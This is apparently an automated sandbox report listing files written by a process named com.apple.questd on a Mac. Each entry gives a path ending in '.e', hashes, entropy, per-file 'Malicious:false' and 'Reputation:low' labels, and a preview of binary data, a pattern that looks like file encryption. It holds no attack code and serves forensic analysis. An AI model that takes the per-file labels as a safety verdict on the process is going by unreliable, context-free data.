                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX.CacheDelete/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):27179
                                                                                                    Entropy (8bit):7.959791791058193
                                                                                                    Encrypted:false
                                                                                                    MD5:A8AB21B7EF3D5EAD47A74FAA0FBF66E0
                                                                                                    SHA1:6D71595965C91055BEAEB5DD7458234CBDA053DD
                                                                                                    SHA-256:125384C5F532AC436111E89096776BE35A3AED5266CDEDFCB1DAD4BB8BDE6063
                                                                                                    SHA-512:571F3DD8E8834E426BC7DFAA5431A18109030FA33616E78BEFD39CA0E731BF0FB3B265F67624B1C28249BEFFE4983F05A331F4FDD8821C1536BA048AABBA4712
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+...[QM..>............X......X/.Kh..3.npV...j',...,...6.S....9.E..6...i.B5|x.fz.DR....T..pL..dMY.0......]V.....g.j...Rq.]V.B.-=.G.o....g.j.....g.j.....&...............g.j.c..A..71.?.]Y\....uOR.}..T/........t.Y...d!.U.]..0(.....!.$.>....d.M.....I..%...".......5..N>...+.J.......Y^..?.....g.j.c..A..71.?.]Y\.....\x.md.7.......|..3L{]N...M."M5....J.s@.<.....n~...Nh..#......K....2...+w.......D.Ip.p.-TD.k#.o&...X......0.:..U...t.p.i...Y.*...m$......=....o&...X...b.!s.8A.....9..!......|.mf.....F.....(AC{...Q..$.S]04...H3.....$...#.l..*%...5.)...'..o".......X.6.r..:.e...aS!.[o\gh.h4.~......D.....E.+.M..[/.yqq9I.X.ol.I/.z.+.M..[/n..`.%.xl.6...R'.+.M..[/..).~....otQ%L.%.....J.........N.!6b...v.O....f&Xa..kA.&....]....}%Z.\.\..+..@.!.....E..wU...h....&...Y..?<{P..x..wW#.....T&;+....3.a..`.}.I....F&b.........].Q....B9.W.!.w.E.%U[b...Zm....|]@....f5.Zht..L...;P.....W.n.U_..#+...\N.(.l..g.]e......(#s......D.....C.;..
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/AEAnnotation/.AEAnnotation_v10312011_1727_local.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2796670989949335
                                                                                                    Encrypted:false
                                                                                                    MD5:B85F480100363E5E7559D90BB0E3D7BF
                                                                                                    SHA1:9F81CB4B8F3940ECA57599D841E10D6AF70E02F4
                                                                                                    SHA-256:FDF63BBF63A95097433CFB35D8E76AE40A9AAE963A3A47757E922353F217C46C
                                                                                                    SHA-512:22C065C49B19367A05697A85299F038653CE86F9CA97B7ADF5B2FAB18857CEA9074C3573304EC1ED4E4D4F45E2C1E570BA2B6A28FA4B4EADFB2954AC0642297E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/AEAnnotation/.AEAnnotation_v10312011_1727_local.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/AEAnnotation/.AEAnnotation_v10312011_1727_local.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):4.585508448129437
                                                                                                    Encrypted:false
                                                                                                    MD5:E763E767A7D11B439717AE48E9AC6566
                                                                                                    SHA1:D4362B82E209017905CBC55DD2DA2EDE036E2112
                                                                                                    SHA-256:F0BFB815401139523F95D1048A48C98E0D9AC69E3C59686EC756C067CB60AB36
                                                                                                    SHA-512:6621D91324A983FECACCD2D5DCED08721E1A5CB133F2AF0A249E01FE4256A6CC2A3DCCA108453B7BB25080DF456BDF93F8A2A80B110286D1476C333F0D07B526
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t^...Ay..........g.g..(...`...=P*t...7...t...7............L.D<.+.......]!../.G...$.x..,xn..n...(..........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/BKLibrary/.BKLibrary-1-091020131601.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3136858550093775
                                                                                                    Encrypted:false
                                                                                                    MD5:348B9FF677D14EC4EA10CC2E27927697
                                                                                                    SHA1:CFEE8300C7428655A94C0351780DA12586EAD294
                                                                                                    SHA-256:9B6F67CD08768EB731EAA2EECBE1FDB94561B20ED3874C1C6FD2C90CCD2B9A07
                                                                                                    SHA-512:AF0F1146767EEBEC4D2353FCF52252295546C7EF089285A8F5CC5AB3132182E52AD8411A72937E34783E09681C1A9DA157063FD01FC898FE918F36346557E641
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L..4.[...<%..@(...*....m...L.-........k.^>.k....L..4.[...<%..@(...*....m.,)u...6u.....k.^.................9.o..h$...................n:..F..2.m.....#p}9...................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/BKLibrary/.BKLibrary-1-091020131601.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):20955
                                                                                                    Entropy (8bit):4.033615824320483
                                                                                                    Encrypted:false
                                                                                                    MD5:83DF236A5F4AEC49EF7BB8F777C593A6
                                                                                                    SHA1:FF24EBF66873F02C4AD5728CE67E67ADACCCD7D3
                                                                                                    SHA-256:88D3EFE05A099A3921E25F1A30981A99806A4C432DF51A64D8106681C6BA8288
                                                                                                    SHA-512:87E51F288FCF4C9051A392682DAC8E1F2A0612D8DD46F67A5EB611F4738A4A51E0C25355FCC7E2E106211082C42AE971ADE2C2E1B31B2C485BC107FD9DC8FFB6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$.....L.-......W..z4..m.......L.-.....TFxg.p....p.x.@...o.kW.........L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/BKLibrary/.BKLibrary-1-091020131601.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):94567
                                                                                                    Entropy (8bit):4.7530928995016835
                                                                                                    Encrypted:false
                                                                                                    MD5:56432996B6E48C18837BB2AC7C9ED8B4
                                                                                                    SHA1:57377AD2FEC992E84DFE7050454C1C98400D76DE
                                                                                                    SHA-256:4CC2EFDD7C3DE9EBB075AACC908C42A1CEF0EA0ED7F6B48F7B0164225D026C62
                                                                                                    SHA-512:06D75508F0D926FF20BA8D7CCE86B132652950F5D994B12AD471C3A0042877D278153ED4C301B9D06B84885D713925244E8ECE3B4093DAC4B128F6E046E65164
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t.f..1S..........3..;............t...7...t...7............L.D<.+.......]!..k.t:.ps:.......i....Cx....*=B..cU9h.....................................................................................................................................................................................s.mA..Md5..ZB..<.$.~....06.........)..t_7u....Y.\{..g../.../.{.....y1...2'.....Y......M...I).{i.......+.....3gc.]..F...&L<Z^.MM...I).{....4x.R3.b>{....].z..GG..JX..]..<.$.~..3P....>......)..z......Z/..........8$.O.....S./.x\.......8{M......z.PQ.H.z.^M...l..\/..v...!..M}..<...A.(._mH..8......1.;..Tt.Jzg.........q.&.g...<.....]s......D..)........ .5>.1.L......z.PQ.H7......sS.0$.X.i.....Mpw........I....5..F2.....}1x...*....z.PQ.Hb<....i......l>.9Gs...B..~....^../.../.{>X.F..u..K.z..;.~.\S.(Z..}!....0Y.\{..g../.../.{.Z.DT_c...2'....1....y..M...I).{......w..;...Y.w..|..O..}J%....../.Ng..{...8$.O......uB........u.TM./e..^t..+3....!".|.[.Q..W....<.$.~..3P....>...Z.s.e.F2.....}..V...5s
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/BKSeriesDatabase/.BKSeries-1-012820141020.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2826798797867807
                                                                                                    Encrypted:false
                                                                                                    MD5:E7A586891B4ED4263DE5056A8EC52C93
                                                                                                    SHA1:D35382BC130EDEA2DF53027D8339A004985633A8
                                                                                                    SHA-256:F70CA26A916076227B64AF155BB8D48FFAAFEBCCF37EE0EE90BAB5A081FF6F45
                                                                                                    SHA-512:105722CBB18C0630FFAE1A5EF8DF9E30F12C154A19DA877B7380E4EB75279DF83FAB720A63DDF46432CFA304F55863F690144DF761E58D2EF1167B04A273E17F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/BKSeriesDatabase/.BKSeries-1-012820141020.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Documents/BKSeriesDatabase/.BKSeries-1-012820141020.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):61781
                                                                                                    Entropy (8bit):3.96546937398061
                                                                                                    Encrypted:false
                                                                                                    MD5:DBE251ACFA8B773CE75A7F60B230C148
                                                                                                    SHA1:1895216962F1D3B946FA4DE35AB94A25F6A90308
                                                                                                    SHA-256:0C9011E94D17391C95F4BDD4578EC7606BE6C8925A7D782D6C95785FA71D5D92
                                                                                                    SHA-512:DBCB183A88F2851A3D1A021722F434CB5767EF99C84F191CC7DCD26D089C25CC9D4A1B273CA9D162637B644429913EB952AD0E7BD22F3D5C8E2F749F8589A0A6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tE.4(..............6...<.[e.....At...7...t...7............L.D<.+.......]!../.G...4....~.DvA.T..l.9..d.........G)z.........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Library/Saved Application State/com.apple.iBooksX.savedState/.data.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2682
                                                                                                    Entropy (8bit):7.761671426590597
                                                                                                    Encrypted:false
                                                                                                    MD5:7B31FB79966AF306950B93D6A6B2E71F
                                                                                                    SHA1:F5CA54A148D0F54B51412AFAE8F944DF94F0AE99
                                                                                                    SHA-256:29669906CA4352887833AA0D6C7CE61DE8C28FFC73761CB162A3129933ABA52D
                                                                                                    SHA-512:5B58A0F9F63A98582CF79FC280E15CD475FB74607C22F81B024FC155451063848B6D806487EB7F03672A2E778CBFA211A05EE84919CAE8C6A605D4E4E56A3ADE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....L.Y*....]........#...Qgq..K....&.:.F^...].Q;1C......uK.i...|...r.....|j.....J..I..'.a..=^z..98.?...5.}.n.4...%.o.........-..*...]rY$....i.0E.u..W......<vm...#.y..../........\47...._r..Y.s..*I.....P1...6r^.S..|~...9.M..5...*B...M.2..H....B...a......d.&.7..8..S._.K.%~O..g..~...._.o.eU.b@.k.!..1......B.]...x&4.Za..V....O..PK'...:g......en.....wm.....T'.I`.1.O.4..9.R..M...{..Bp..t<....;..a.8.]..v.i]...9.*0;T...}....a...Dhv..e.z.E...Rc.F..y.(F.N.A.x...#.|.Lt..hS..C%Q..4..Ez.%...2.......v..4...%.....c.|...._........-]J-.x....3e.......dvS....w.G...q.3...#.h..W..~T.]d..v`..I.R.Wn88+>p.I..nz.C.......v.s..?5..4.^.b.vv.)..w?.4.s....D.h&.9.h'............D..X...>.6hb.g...c.K.{.i....7OO....6..}:........L........A.......'/CA..'...6..!u.|..X..%k...;:tD..HIj....e.u0;.s.K....!az..L...#.....Y-#...g....L........?.4.L,...).s.q].5.K..JJ....../w.`.....i]..||A.Y.......p..$#..HVl/lFD_..>....L;..Le..Z...Q{.f.........gMq.8U3..n....m....k......*...9o%....(w..L..._....k;...Y.<.b..7..1...xE...;O......5h%4......
                                                                                                    /Users/ben/Library/Containers/com.apple.iBooksX/Data/Library/Saved Application State/com.apple.iBooksX.savedState/.window_2.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7050
                                                                                                    Entropy (8bit):7.936814256578615
                                                                                                    Encrypted:false
                                                                                                    MD5:DD73BE1EF026CEBE4A89862BED4C1069
                                                                                                    SHA1:36D2EF6960E14A1D11FB9BB8E06B0F1C34DE079B
                                                                                                    SHA-256:61FC9DFDFB3E2373BE3D097338F77720DD9D4C07DE4C23F6292A5870C266D022
                                                                                                    SHA-512:B83621944BA9401AE46A4A0DC7FC4CF50254B0050287714A1D3F8BD689727F719AD9BB4128E7BC89FBD94312F6F37F1D82F20010C763A82AA5EA1611DA56BA40
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: G..6....l.....f|.F.d*.....).7.".'i...1.&.858[..~>......K...{..C\.)&..l.S.O.b...M}:.m."J..{..-.J....O..U..0.c.M.........?.dz.t....K..k.t\>N.bi.W......'.i...$.....^..Q..,JLM..~.. ..<./B2.1.:.(......xH.T.....}.......F._..6.......(!.M%..x....6................J.....B[.....}.q....... .&.#......V.u..)Z..xf.v4/.4.v....R .....P...{..v.S[...<@.....9.Ce...."6.!f...tV.;..@..'...Z...H..<...'...tm@.<...:..b.....?..h_.6.u8~}.g.X4...Z.n..@.X..~.."..x]s....l4yt..i....K.........9.;..|v.....n&U.&uf.*., .O.F16.g...6.......7....d..=.]........b....:8_p.2....I....9...+P.b..S%Z._.....Y.,....Z..)9<E9.aCw..3.&.R.yK......C[.ziJ<.<....%.....r..2..O6.S...ju@{s.d...$.0C.|.....h.d..-i.....w.P`.bD.Q..t,....:......0..63.(.M.|._.l.......D.u~v ..Ip....!x.A/.X..j.\.......vn^.C.b.1...8?...+P.>..`...^\..v.K(@&b..i.-......]uG...VX.u......:..$.uK..eh..h:..........Na12......,..d;..4b..IC...$\r...4|.L'R-.;.@...7.o.(......m..KK.............e....-.l..kE.....=.L. .l.)...L...H...@.z`.z...7...=....$....O...<5c..T.Z#9..8.........>..
                                                                                                    /Users/ben/Library/Containers/com.apple.iCal.CalendarNC/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):34596
                                                                                                    Entropy (8bit):7.967310266994146
                                                                                                    Encrypted:false
                                                                                                    MD5:49AD0BEDB4D5FD5BB061FFC8BC4FF733
                                                                                                    SHA1:DBA12B521A6D12355401F96CE4BC995A7D778EFB
                                                                                                    SHA-256:853B3054BFF03898AF1D252CF43D1BE2A80658C24497C1A1CD950DFECDE5A9A4
                                                                                                    SHA-512:E40F14C24AF31CABDCF40C4D6EBF7326A0059BA5986A7E52FFCF5D4B12422313B2E4A1CE4038B40E7C05C1FE9150455C24DA09E6815A2CF6781AD376DD3404C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+....."}.E{A.....3........$F..zd7..~5..?.mmG....p8p.......n...0].$....D_e...a.G...?.z....%.!..C'..N...2.d.F.V......T."R...L.jCN..0..V.......V..........~..@.q.:.XG..V......a....x..... ...\...8.fq9..G....w.s...c.G...Z`....8.B.V.::..Q.M..l8..w...M..e.{..Rs.o..lRr....;...7NGp.~ro........V......a....x..... ...\...:.J.n9.Ti.il...kT.W.....V!..K .7..E....r...%..n..GZ.O(.}y...>....Il....i.).0..g.....u.......v....d0.0\=..v.h;Wcpo.d..u.........C........%...jg..2..........z..\W.Q.I.u........Re#......R.!:.7.O...=..2e.......t%C0:.Z.t...YB....Q&>.lAh....:.=.^)..H..jl...L.3q06Bt).".......s..;K.1...d.J."f.z@5.M..`...&=.m....2.....pf.u...\`.....&h^...JJdc.....(B(.4....9.S..v&odc.....(w..... ....qX.f.dc.....(..m-.7..g.h...n}....................w....5q...2./......J...=??t.y..|....o..0.^H.|..r.N....sq.e.....l....+....L,.....|.. .6K............HH....#..,..L...}.(.....B>....>..R....eME....i..G6......S..NS..C...AO...$4L."G+*+
                                                                                                    /Users/ben/Library/Containers/com.apple.iCal/Data/Library/Saved Application State/com.apple.iCal.savedState/.data.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2714
                                                                                                    Entropy (8bit):7.751167236282773
                                                                                                    Encrypted:false
                                                                                                    MD5:8FDB8EC114A5FFAB6AA29DB92D621545
                                                                                                    SHA1:8B3A49DA3B8E81286BCE6A40D90694788419B8EA
                                                                                                    SHA-256:E895D6E15559C469CA2A8AD8204B6106DBA5E2A11B0CD9B471EEAB4CE55E3402
                                                                                                    SHA-512:A8428CE2937DD27AC090162A5D0F25E8A238BDF8ABF48112AD89962B5DB49A7CB17AE6FF14FC596321FFA06829A64F507F536345902511A9D67FEA191534B19F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....L.Y*Q...=.X%.2..B.6V.....Q._...\.wd..(lh....t.N!.rZ0h.Z..j../{.b...U......F..7..]..W<4.?..M...6[....Tb.PK.}..coY.....w.}ez..c..`Yn.;.)|.q...!.%....3|7~....:......9.0.....*D..v?......>!gj............{.O8|.....T=M....S...N..n.D..........s.z.k.7*..c!n....w......Qs..S:e_...]..!...`...tP...8..:.`x9..*....b....P..9......+}T2.......'......Q{....(.]:.X3L..&.9...=..)..X.Y=..,th_H.........C..Rb.q.v.Jh..6..S...........pa.<(]..R2....4IP....(.....:..e......~....a...w.>y..{E....h.._T.vz=&I..*n.{.mo<.......I.......2..6...fB7k......MJV....!Vpy>.X.C....WG_..:..Y.<...y..#..%...>y.C+_....2.q<..b...AD. .;..V..K...,..Qz..f....umB....@Tr.[^....'X.QR.E=..'...............i.!L....."R[!...!.z....B{.......5...9.{{.o.g...k.$|...W...VFT..J....2...+r.....hT.z9.x.7.{.C_..t.s.(..B]..h:LS+.lq.U..P....,<ey....D...=o...a..2a..[..Z...Th....x.y..l.T...%m.T...C.....!....,?C.+JG.@.(X..G......y5;...NT...g./fP...{......?J...Z.U..a@...2!.7..^.:-R..*83eTB._{.z.Z.-.AHp_F..G?O..2^[j...=n...7..a>.QMQ.>;.p..X.Ed...z..O......U..
                                                                                                    /Users/ben/Library/Containers/com.apple.iCal/Data/Library/Saved Application State/com.apple.iCal.savedState/.window_2.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6234
                                                                                                    Entropy (8bit):7.922559922255116
                                                                                                    Encrypted:false
                                                                                                    MD5:03012DBE97A0221D7D4A0E69EA3C573B
                                                                                                    SHA1:1C0086E5C0E18C77DB35021145CFD31CEC891407
                                                                                                    SHA-256:8634960015265477E8F953F05D76B870D0480A5773E551B2337AA241CA553855
                                                                                                    SHA-512:C230432FC50777C9F788089E5B285DD0BBA97AA6FFD89EC300928D6F94350EE02FAD7C3CB03EFAEE3A3F1FC5CBF195B8A1A74BBCE8AFF00A9224AF8770843445
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 6...nw..p.v.....F.......~.....R.....6.P..R.4..d.f%l.W".C.JY..0*.F.....!.<.g..n.l...f^.d.:@..G.[......p.(..._G.*.I......x.KK.0.f..F........YS...M)./..a.....w....o.({!..o......../.|\CL4.L.B...<I^.L2....0..G.....O&sw.T....d.....t_..M.......k....*3.=..ZR.a......S.02...X...rt;.}L1...^S.KA.7'Ll]......*o..?^e...w.ht%..g....&.%M.=..VT.r..$... k........I.....P.tR.;.x.....U5./...k.R...U=.t&...j.'.$8..9k...<.."..%..I.a.%.8.&...br.d....U..W...6H..X....C.>.x.v..x..E.W9.75.Ze...E.J...D|.D..m...U.d.{.T2.....z.Kqr=...|.rb.Q!..qK...h. ..h.H..Q....r|D...!.:..fl...!..,.!6...[.;...MR.....H..$\t...%....}e../|<.*.]....A;s....._....B.]...).......NPa.R.......oM_q}.I".ED..X.0R.w._......H=.g....p...0}..........7X...>.exw.....OkY..D....Dx......U...zy.X.G....%i.'..0...2...l..................a2....%....3Dro........J.9.....-.\......Z5^..egz._...>.....hm.....1.\*...w.Ws...gm...H.^..[T..P..0.>.8...p|..z....P..=4./.......}T....>..,i......]..2....Q~....?.A.....-$.Z..+.......8.z.....x....@....(.G.G.|...?>..nl.+.~.gTp7 g
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):40940
                                                                                                    Entropy (8bit):7.973520666037022
                                                                                                    Encrypted:false
                                                                                                    MD5:0ADFE133CEC683F522FC5359F4AAAFB1
                                                                                                    SHA1:C674EE8240355B007246E8E035F86218A28313BC
                                                                                                    SHA-256:36567D241DE7C51B0E3632C125A38B4F563CA56F0A8BD208F225C4CCB5162189
                                                                                                    SHA-512:73EEFD71C62BDE59C3D3ABDD41C5C7E3E5B97B23D41C910007AA9DDC01F4B3BFF711E1B4A02583521BC5E65D053DB19BEC37104CC5E06A45265AA134456AB465
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R.;.jF....sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0P.+X..&...%...z.NW.k....u......:I..v.#.......~m]Dt..=......Y......0.eo..;i.....%.Y-&.V..b..-..EX[...!...C....Q;........R..9....u8..l4...c...B..T..9....u..9....u..e. ....(?L.e.)..9....u.X.o#.......^....v..h...a...9[1m-5.}.....IY......S.#.q.&..g'i.7_.2........l.....~...Vn'.c...h....R.FJ.............9....u.X.o#...5..8=L.. ...h....'sy..*5...,..Lk.o......y.._.....X]...J$...L...2.L..9N^..k.p5....fc......`?........\wa.."....._.3}ygm$F.i.i..w..h...!.;....H_..9q.?.G..~..\=...t2.5`\.....G....s..t..,z.|G..w.........\..eF.vi.B.pyR.e.`.<ZmL.....F...x...1....%.........u.._...C...o.I..s.N..K.#.......:-.gnh....%#.&I.!......w"........j.2.........M.5t......[..r..A,...l|E.R.M...........q.Z(.....u..$..S..t.8L..F.cBbH.i.][.$..S..t......M..>.5..V.H$..S..t....]M./*...o7K^.TxE..G..H...bU.e....\.1...O.w....a)..k.....:.RWtE.4......._h.t].....P.......DI..Y.?..6.4.g.%........|.. ..fg.n....p........s...k....._.]..a......0..(...........
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Logs/Mail/.2017-05-31_Library.log.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):986
                                                                                                    Entropy (8bit):7.081568679974305
                                                                                                    Encrypted:false
                                                                                                    MD5:C7684D3FD1B212120F17F170F27E8872
                                                                                                    SHA1:C30C8A9B1C01EB1776E601FE0951D897ADAF85FC
                                                                                                    SHA-256:B9BDE3FDF9457E9620AAA6F88248FA3CAE524248761CE767ECD4C7DBE3919209
                                                                                                    SHA-512:95A2A75E5A72606D325E4B044FC9CAA9233E08324DF729125AECD137A35B26F389C5B844ADA028606BDD55BC2AC587E4C7AB3A7CFF1CBB8D57207878B6F6980B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .....p..]`.......<kRo).......e.\`.....$..P.b.....j.....s...w...<..<."O.I.........Q^I.9../..`O.../o...h......'g.....b.p.S.wmVx.A.......4.w........(p3?............g.$.I>C.._.....=..P.E....%..Pv.)A..W.*..`Z.^.......q.....J)v....D....1...........K.!....g.$.I>C.._.....=..P.E....%..Pv.)A..W.*..`Z.^.......q...t...G.={...!t.J...}P.c=......p.....C...".<kRo).......e.\..x\s^.....%ZlJ|..._...-........ ;.{w.............K.!....g.$.I>C.C....C0=..P.E....%..Pv...7..~.........Sl.4..].A...N.M./,..M..z.n.D(..r...\.3!.......p........%..<kRo).......e.\.g.5...7...t[+q/H.k._?...t|.'q....h....~Jz..^Y....g*..?.v....:...k...Q,.E.......|....]u.J_.?......u4.yE....w...<.l...[C e..Uz.b..O......TAo.......................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Logs/Mail/.2017-05-31_MailUpgrader.log.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):482
                                                                                                    Entropy (8bit):5.919699013416989
                                                                                                    Encrypted:false
                                                                                                    MD5:F0C3152D09DA888F000CF08073232924
                                                                                                    SHA1:B995270D81849ED667338DDAC3466A69F9845941
                                                                                                    SHA-256:9DAB596BB7495D3E711ADBB2715E6C0F8998CC7C70B2228CD78CA532E1FC1CCE
                                                                                                    SHA-512:473FAD0DCE539B07F1E128C4DC243565BDE2E26AE4E830F2652C15B2BA3C66BBD18BA06405967FACCBF9FE92C5135CE47B8A1CCCC238996D69687B160101C872
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .....p..]`.......<kRo).......e.\.Fl\.....C.;.....I...........*....[...j...|.4i.......Na.R...H:7W.z...OJ...o.:..3#'2.-9M .._Qb|...B.9s......Gw2{~....!.......u=....u......X..... ..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Logs/Mail/.2017-05-31_MessageFilter.log.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):490
                                                                                                    Entropy (8bit):5.833264294856115
                                                                                                    Encrypted:false
                                                                                                    MD5:548838A2DC27CBCFF9267B48BA14D069
                                                                                                    SHA1:428DD2FE492628E6913679895BF75F556C09544C
                                                                                                    SHA-256:2648C81AAC482542757D31C2FB46AB0214CB7EE49DCFBA9F8ECB739CACF23A1C
                                                                                                    SHA-512:FEED68793843FC99C0F9ADA3109B992FBAA3CC9E597CBC178611C33D2CA2A7319526BECB17BDFD69616566431BFBFFA6D17032A5E406F27170AFD9705CBC2799
                                                                                                    Malicious:false
                                                                                                    Reputation:low
